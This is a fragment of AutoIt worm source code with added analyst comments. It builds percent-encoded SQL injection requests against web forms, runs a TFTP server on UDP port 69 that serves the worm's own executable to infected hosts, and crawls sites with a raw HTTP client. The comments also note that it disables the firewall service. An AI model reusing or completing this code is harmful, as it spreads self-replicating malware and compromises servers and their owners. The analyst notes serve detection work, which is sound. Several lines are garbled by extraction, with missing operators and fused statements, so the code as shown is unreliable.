$sTempVect = StringReplace ( $sVect , $Param [ $p - 1 ] & "=" & $Param [ $p ], $Param [ $p - 1 ] & "=" & $Param [ $p ] & FormatQuery ( ";" & $sQuery & "--sp_password" ))
if ( $sMethod = "GET" ) Then
$query = $sMethod & " /" & $sTempVect & " HTTP/1.0" & @ crlf & "Host: " & $sp & @ crlf & @ crlf
Else
$newparams = Stringmid ( $sTempVect , Stringinstr ( $sTempVect , "?" )+ 1 )
$query = $sMethod & " /" & stringleft ( $sTempVect , stringinstr ( $sTempVect , "?" )- 1 ) & " HTTP/1.0" & @ crlf & "Host: " & $sp & @ crlf & "Content-Type: application/x-www-form-urlencoded" & @ crlf & "Content-length: " & stringlen ( $newparams ) & @ crlf & @ crlf & $newparams & @ crlf & @ crlf
EndIf
TCPSend ( $s , $query )
if TFTPSession ( 6000 ) then
Return True
EndIf
EndIf
Next
TCPCloseSocket ( $s )
Return False
EndFunc
Func FormatQuery ( $sQ ); formats the sql query to be better injected
; Percent-encodes every character of $sQ as "%XX" (two hex digits of Asc()),
; including characters that would not normally need encoding.
; Returns "" for an empty input. Note $sNewQuery is Dim'd without an initial
; value and used with "&", so it starts as an empty string.
; Analyst note: because all characters are encoded, signature matching on the
; raw keywords must be done after URL-decoding the request.
if Stringlen ( $sQ )= 0 Then Return( "" )
Dim $sNewQuery
For $c = 1 To Stringlen ( $sQ )
$ch = ""
$ch = Stringright ( Stringleft ( $sQ , $c ), 1 )
$sNewQuery = $sNewQuery & "%" & StringRight ( Hex ( Asc ( $ch )), 2 )
Next
Return( $sNewQuery )
EndFunc
func TFTPSession ( $MAX_WAIT ); starts a tftp session and waits for inputs for the given period of time
; Binds UDP port 69 on @IPAddress1 and waits (the loop condition is truncated
; in extraction; $MAX_WAIT is in milliseconds per TimerDiff()) for a datagram.
; The received data is rendered with String() and cut after the first "x",
; i.e. the "0x" prefix of a binary value is dropped; if the remaining hex
; starts with "0001" (TFTP RRQ opcode) the file transfer is handed to
; SendWorm() and its result is returned. Returns False when the bind fails or
; nothing usable arrives in time.
; Analyst note: a non-system process binding UDP/69 on a workstation is a
; strong host-based indicator; blocking inbound UDP/69 at the host firewall
; prevents the callback entirely (note that FixReg() disables SharedAccess).
Dim $ret = False
Dim $port = 69
Dim $ipaddr =@ IPAddress1
UDPStartup ()
Dim $s = UDPBind ( $ipaddr , $port )
if $s =- 1 Then
Return False
EndIf
Dim $ti = TimerInit ()
; (extraction artifact: the loop condition is merged with the next statement)
while TimerDiff ( $ti ) $recv = UDPRecv ( $s , 512 )
if @ error then
ExitLoop
EndIf
; (extraction artifact: comparison operator missing below)
if String ( $recv ) "" then
$recv = stringmid ( string ( $recv ), Stringinstr ( string ( $recv ), "x" )+ 1 )
if ( stringleft ( $recv , 4 )= "0001" ) then ; RRQ
$ret = SendWorm ( $s )
ExitLoop
EndIf
EndIf
WEnd
UDPCloseSocket ( $s )
UDPShutdown ()
Return( $ret )
EndFunc
func SendWorm ( $socket ); send the worm over the net w / e a tftp request is made
; Serves the running executable over an already-bound UDP socket using TFTP
; DATA packets: opcode 0x0003, a 4-hex-digit block number starting at 1, and
; up to 512 bytes of file content per block; each block is resent until an
; ACK (0x0004 + same block number) is received or 5000 ms pass without one.
; $socket - UDP socket from UDPBind(); -1 returns immediately (no value).
; Returns True only if the loop ran past the last block, i.e. every block was
; acknowledged; False if the file is missing (an error packet 0x0005/0x0001
; "File not found." is sent) or a timeout/send error broke the transfer.
; Analyst note: the transfer is the worm binary itself, so a packet capture of
; the UDP/69 exchange yields the complete sample.
if $socket = - 1 then Return
Dim $name = @ AutoItExe
if not FileExists ( $name ) Then
UDPSend ( $socket , BinaryString ( "0x00050001" )& "File not found." & Chr ( 0 ) )
Return False
EndIf
Dim $opcode = "0x0003"
Dim $block = ""
Dim $data = ""
Dim $size = FileGetSize ( $name )
Dim $totblocks = int ( $size / 512 )+ 1
Dim $fhandle = FileOpen ( $name , 0 )
Dim $filedata = FileRead ( $fhandle )
FileClose ( $fhandle )
For $bnum = 0 To $totblocks
$block = Stringright ( String ( Hex ( $bnum + 1 )), 4 )
$data = stringmid ( $filedata ,( $bnum * 512 )+ 1 , 512 )
Dim $packet = BinaryString ( $opcode & $block ) & $data
; Retransmit loop: send, then poll for any datagram for up to 5000 ms.
Do
UDPSend ( $socket , $packet )
if @ error or $socket =- 1 then ExitLoop
Dim $tm = TimerInit ()
Do
Dim $r = UDPRecv ( $socket , 512 )
if @ error then ExitLoop
Until ( stringlen ( string ( $r ))> 0 or TimerDiff ( $tm )>= 5000 )
if (@ error or TimerDiff ( $tm )>= 5000 ) then ExitLoop
Until ( $r = binarystring ( "0x0004" )& BinaryString ( "0x" & $block ) )
Next
Return( $bnum > $totblocks )
EndFunc
Func HTTPRequest ( $sResource ); retrieves the given resource from the internet
; Minimal HTTP client over raw TCP. Accepts "http://host[:port]/path[?query]"
; optionally suffixed with "#METHOD" (the form Analyze() stores in the link
; lists); anything that is not an http URL returns "". Resources larger than
; 512000 bytes (InetGetSize) return "". Sends an HTTP/1.0 GET, or a
; form-encoded request with the method name for the "#METHOD" case, with only
; a Host header, reads until the peer closes, and:
;  * returns the full raw response (headers included) on a 200 status;
;  * on any other status follows the first "Location:" header by recursing
;    into itself (no redirect-count limit is visible), else returns "".
; $sResource - URL as described. Returns the response text or "".
; Analyst note: HTTP/1.0 requests with a Host header and no User-Agent are
; atypical for browsers and can be used as a coarse server-side filter.
Dim $s = - 1
Dim $sServer = ""
Dim $nPort = 80
$sResource = FormatURL ( $sResource )
if ( not IsAnHTTPService ( $sResource ) ) then Return( "" )
Dim $sHTTPMethod = "GET"
If StringInStr ( $sResource , "#" )> 0 Then
$sHTTPMethod = Stringright ( $sResource , Stringlen ( $sResource )- StringInStr ( $sResource , "#" )- 2 )
$sResource = Stringleft ( $sResource , StringInStr ( $sResource , "#" )- 1 )
EndIf
Dim $size = InetGetSize ( $sResource )
If ( $size > 512000 ) Then Return( "" )
if $size = 0 then $size = 512000
; Element 3 of a "/" split of "http://host[:port]/..." is host[:port].
$url_parts = StringSplit ( $sResource , "/" )
$sServer = $url_parts [ 3 ]
if ( StringInStr ( $sServer , ":" )> 0 ) Then
$nPort = Int ( StringMid ( $sServer , StringInStr ( $sServer , ":" )+ 1 ))
$sServer = Stringleft ( $sServer , IndexOf ( $sServer , ":" , false ))
EndIf
$url_parts [ 1 ] = ""
$url_parts [ 3 ] = ""
$sResource = join ( $url_parts , "/" )
$sResource = FormatURL ( $sResource )
$s = TCPConnect ( TCPNameToIp ( $sServer ), $nPort )
if @ error Or $s = - 1 then Return( "" )
Dim $sp = $sServer
; (extraction artifact: comparison operator missing below)
if $nPort 80 then $sp = $sp & ":" & $nPort
if ( $sHTTPMethod = "GET" ) Then
Dim $query = $sHTTPMethod & " /" & $sResource & " HTTP/1.0" & @ crlf & "Host: " & $sp & @ crlf & @ crlf
Else
Dim $newparams = Stringmid ( $sResource , Stringinstr ( $sResource , "?" )+ 1 )
Dim $query = $sHTTPMethod & " /" & stringleft ( $sResource , stringinstr ( $sResource , "?" )- 1 ) & " HTTP/1.0" & @ crlf & "Host: " & $sp & @ crlf & "Content-Type: application/x-www-form-urlencoded" & @ crlf & "Content-length: " & stringlen ( $newparams ) & @ crlf & @ crlf & $newparams & @ crlf & @ crlf
EndIf
TCPSend ( $s , $query )
If @ error Then Return( "" )
Dim $ret = ""
; Read loop ends only when TCPRecv() sets @error (peer closed or failure).
While true
Dim $tmpret = TCPRecv ( $s , 2048 )
if @ error Then ExitLoop
; (extraction artifact: comparison operator missing below)
if $tmpret "" then
$ret = $ret & $tmpret
endif
WEnd
if ( StringInStr ( $ret , "HTTP/1.1 200" )= 0 and StringInStr ( $ret , "HTTP/1.0 200" )= 0 ) Then
$loc_ndx = StringInStr ( stringlower ( $ret ), "location: " )
if $loc_ndx = 0 then Return( "" )
Dim $lines = StringSplit ( $ret ,@ crlf )
Dim $new_loc = ""
For $j = 1 to $lines [ 0 ]
If stringlower ( stringleft ( $lines [ $j ], 10 )) = "location: " Then
$new_loc = StringMid ( $lines [ $j ], 11 )
ExitLoop
EndIf
Next
if stringlen ( $new_loc )> 0 Then
$ret = HTTPRequest ( $new_loc )
Else
$ret = ""
EndIf
EndIf
Return( $ret )
EndFunc
Func IsAnHTTPService ( $sService ); checks if the resource is pointing to an http protocol or not
; Returns True when the FormatURL()-normalised string starts with "http"
; (case-insensitive); this also accepts "https" and any other "http..." prefix.
$sService = FormatURL ( $sService )
$sServiceType = StringLower ( Stringleft ( $sService , Stringlen ( "http" )))
Return( $sServiceType = "http" )
EndFunc
Func Strip ( $InLine , $flag_char1 , $flag_char2 ); removes all chars between the given two (and them too ) from the given string
; Copies $InLine to the result while skipping every run that starts at a
; $flag_char1 and ends at the next $flag_char2 or newline (@lf is always
; treated as a terminator and is kept in the output; the flag characters
; themselves are dropped). Used by Analyze() with ("=","&") to reduce
; "a=1&b=2" to "ab" for comparing vectors by parameter names.
; Note: the loop runs from 0 to Stringlen, so the first iteration examines an
; empty string; $sResult is Dim'd without a value and starts empty.
$bWrite = true
Dim $sResult
for $n = 0 to Stringlen ( $InLine )
$char = ""
$char = Stringright ( Stringleft ( $InLine , $n ), 1 )
if ( $char = $flag_char1 ) then
$bWrite = False
elseif ( $char = $flag_char2 Or $char = @ lf ) then
$bWrite = True
if $char = @ lf then $sResult = $sResult & @ lf
elseif ( $bWrite ) then
$sResult = $sResult & $char
endif
next
Return( $sResult )
EndFunc
Func LastIndexOf ( $str , $chars , $bCheckCase )
; Returns the 0-based position of the last occurrence of $chars in $str, or -1
; if absent. $bCheckCase false lowercases both sides before comparing.
; Implementation: for each prefix length $ndx, compares the prefix's trailing
; Stringlen($chars) characters with $chars and records the latest hit; this is
; O(n*m) string slicing but has no early exit, which is what makes it "last".
$index = - 1
if ( not $bCheckCase ) then $chars = StringLower ( $chars )
for $ndx = 0 to Stringlen ( $str )
$c = Stringright ( Stringleft ( $str , $ndx ), Stringlen ( $chars ))
if ( not $bCheckCase ) then $c = StringLower ( $c )
if ( Stringlen ( $c ) > 0 and $c = $chars ) then $index = $ndx - Stringlen ( $chars )
next
Return( $index )
EndFunc
Func IndexOf ( $str , $chars , $bCheckCase ); same as stringinstr but returns 1 less
; Returns the 0-based position of the first occurrence of $chars in $str, or -1
; if absent; $bCheckCase false makes the comparison case-insensitive.
; Same prefix-slicing scheme as LastIndexOf() but exits at the first match.
; Note: unlike LastIndexOf(), there is no Stringlen($c)>0 guard here, so an
; empty $chars matches at $ndx = 0.
$index = - 1
if ( not $bCheckCase ) then $chars = StringLower ( $chars )
for $ndx = 0 to Stringlen ( $str )
$c = Stringright ( Stringleft ( $str , $ndx ), Stringlen ( $chars ))
if ( not $bCheckCase ) then $c = StringLower ( $c )
if ( $c = $chars ) then
$index = $ndx - Stringlen ( $chars )
ExitLoop
endif
next
Return( $index )
EndFunc
Func FormatText ( $sText ); formats our text to be better searched
; Normalises an HTML body before Analyze() splits it on @lf: CR/LF sequences
; and bare CR / LF characters are removed, and (per the truncated lines below,
; whose string literals beginning with "<" were lost in extraction) the text is
; cut at a starting tag and some tag boundary is replaced so that each tag
; ends up on its own line. Returns the rewritten text.
; (extraction artifact: the first and last statements are merged with the
; remains of string literals on the same physical line)
$sText = StringMid ( $sText , IndexOf ( $sText , " $sText = Stringreplace ( $sText ,@ Crlf , "" )
$sText = Stringreplace ( $sText , chr ( 13 ), "" )
$sText = Stringreplace ( $sText , chr ( 10 ), "" )
$sText = Stringreplace ( $sText , " Return( $sText )
EndFunc
Func FormatURL ( $sURL ); formats correctly the given url
; URL normaliser used before every comparison and request in this file:
; strips CR/LF, unescapes "&amp;"-style entities (the literal on that line was
; altered in extraction), converts "\" to "/", removes "." segments and
; collapses "x/.." pairs, squeezes repeated "/" (re-expanding the "://" of the
; scheme), and drops a leading "/". Returns "" unchanged for empty input.
; Note: the extraction also altered the "/" separators on several lines below
; to " / " with spaces, and the end of this function is fused with the start
; of GetResourceExtension() on a single line, so the two cannot be separated
; here; GetResourceExtension() appears to return the extension of the last
; path segment with any "?query" removed.
if Stringlen ( $sURL )= 0 Then Return( $sURL )
$sURL = Stringreplace ( Stringreplace ( $sURL , chr ( 13 ), "" ), chr ( 10 ), "" )
$sURL = StringReplace ( $sURL , "&" , "&" )
$sURL = StringReplace ( $sURL , "\"," / ")
$UrlPart = Stringsplit($sURL," / ")
For $i=1 To $UrlPart[0]-1
if Stringlen($UrlPart[$i])>0 Then
if $UrlPart[$i] = " . " Or $UrlPart[$i] = " .. " Then
$UrlPart[$i] = ""
Else
if $UrlPart[$i+1] = " .. " Then
$UrlPart[$i] = ""
$UrlPart[$i+1] = ""
EndIf
EndIf
EndIf
Next
$sNewURL = join($UrlPart," / ")
While( StringInStr($sNewURL," //")>0 )
$sNewURL = Stringreplace ( $sNewURL , "//" , "/" )
WEnd
$sNewURL = Stringreplace ( $sNewURL , ":/" , "://" )
if Stringleft ( $sNewURL , 1 ) = "/" Then
$sNewURL = Stringright ( $sNewURL , Stringlen ( $sNewURL )- 1 )
EndIf
; (extraction artifact: the rest of FormatURL, its EndFunc, and the header and
; body of GetResourceExtension are collapsed into the next line)
If ( StringInStr ( $sNewURL , "#" )> 0 And LastIndexOf ( $sNewURL , "&" , false ) 0 then $ext = stringleft ( $ext , indexof ( $ext , "?" , false ))
Return( $Ext )
EndFunc
Func GetOption ( $opt , $HTMLline ); returns the value of the specified HTML parameter
; Extracts the value of attribute $opt (e.g. "href", "action", "name") from a
; single line of HTML. The search for `opt=` is case-insensitive; the value is
; read from two characters past the "=" up to the closing delimiter, which is
; the quote character found just before the value when it is ' or ", otherwise
; a space. Returns "" when the attribute is not present.
; Note: the "+ 2" offset assumes exactly one delimiter character after "=";
; an unquoted value therefore loses its first character, and a match on
; `opt=` inside a longer attribute name (e.g. "xname=") is not excluded.
Dim $Link = ""
$opt = $opt & "="
Dim $ndx = IndexOf ( $HTMLline , $opt , false )
if ( $ndx = - 1 ) then Return( "" )
$ndx = $ndx + Stringlen ( $opt ) + 2
Dim $end_char = stringmid ( $HTMLLine , $ndx - 1 , 1 )
; (extraction artifact: comparison operators missing below)
if $end_char "'" and $end_char """" Then
$end_char = " "
EndIf
For $i = $ndx to Stringlen ( $HTMLline )
$char = ""
$char = Stringmid ( $HTMLline , $i , 1 )
; (extraction artifact: comparison operator missing below)
if ( $char $end_char ) then
$Link = $Link & $char
else
ExitLoop
endif
Next
Return( $Link )
EndFunc
Func join ( $array , $join_char ); split function^(- 1 )
; Inverse of StringSplit(): concatenates $array[1..$array[0]] with $join_char
; between elements. Expects the StringSplit() layout where element 0 holds the
; count. Returns "" for an array with no elements. Callers here blank
; elements 1 and 3 first to turn "http://host/a/b" into "//a/b"-style paths;
; FormatURL() then squeezes the doubled separators.
If UBound ( $array ) = 0 Then Return( "" )
Dim $res
For $e = 1 To $array [ 0 ]
$res = $res & $array [ $e ] & $join_char
Next
Return( StringLeft ( $res , StringLen ( $res )- 1 ))
EndFunc
func onautoitexit (); on exit,
; AutoIt calls this automatically at script exit; it only releases the TCP
; subsystem started with TCPStartup() in resident mode.
TCPShutdown ()
EndFunc